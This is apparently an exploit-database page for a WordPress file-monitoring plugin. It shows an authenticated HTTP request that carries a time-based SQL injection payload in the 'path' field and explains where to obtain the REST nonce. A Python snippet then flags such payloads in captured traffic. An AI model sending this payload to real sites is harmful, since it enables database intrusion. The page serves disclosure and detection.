## https://sploitus.com/exploit?id=WPEX-ID:BB348C92-D7E3-4A75-98AA-DD1C463BFD65
A user with the `manage_options` permission can exploit the vulnerability with the following request:

```http
DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1
Host: 127.0.0.1
X-WP-Nonce: 5732d8605b
Cookie: [redacted]
Content-Type: application/json
Content-Length: 54

{"path":"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'"}
```


The nonce required for the `X-WP-Nonce` header can be found in the source code of the page `/wp-admin/admin.php?page=wfcm-file-changes`, at the following line:

```js
var wfcmData = {"restNonce":"5732d8605b","restAdminEndpoint":"http:\/\/127.0.0.1\/wp-json\/website-file-changes-monitor\/v1\/admin-notices","adminAjax":"http:\/\/127.0.0.1\/wp-admin\/admin-ajax.php"};
```
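
For triage, requests to this route can be checked in captured traffic or proxy logs. The following is an added example, not part of the original advisory or the plugin's code: it flags `path` values sent to the route that contain characters or SQL constructs a directory path would not. The marker list, function names and the benign sample are assumptions of this example.

```python
import json
import re

# Route taken from the request shown on this page.
ROUTE = "/wp-json/website-file-changes-monitor/v1/mark-read-dir"

# Heuristic markers (assumption of this example): not expected in a directory path.
MARKERS = [
    ("quote", re.compile(r"['\"`]")),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("time_delay", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
]

def parse_request(raw):
    """Split a captured HTTP/1.1 request into (target path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    _method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    return target.split("?", 1)[0], body

def flag_request(raw):
    """Return marker names found in `path`; [] if clean or another route."""
    try:
        target, body = parse_request(raw)
    except ValueError:  # malformed request line
        return []
    if target.rstrip("/") != ROUTE:
        return []
    try:
        value = json.loads(body).get("path")
    except (ValueError, AttributeError):  # not JSON, or not a JSON object
        return ["unparseable_body"]
    if not isinstance(value, str):
        return ["non_string_path"]
    return [name for name, rx in MARKERS if rx.search(value)]

# Request from this page (nonce and cookie headers omitted).
PAGE_REQUEST = (
    "DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\nContent-Type: application/json\r\n\r\n"
    "{\"path\":\"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'\"}"
)
# Constructed benign request for comparison.
BENIGN_REQUEST = (
    "DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\nContent-Type: application/json\r\n\r\n"
    '{"path":"/var/www/html/wp-content/uploads/2021"}'
)

if __name__ == "__main__":
    print(flag_request(PAGE_REQUEST), flag_request(BENIGN_REQUEST))
```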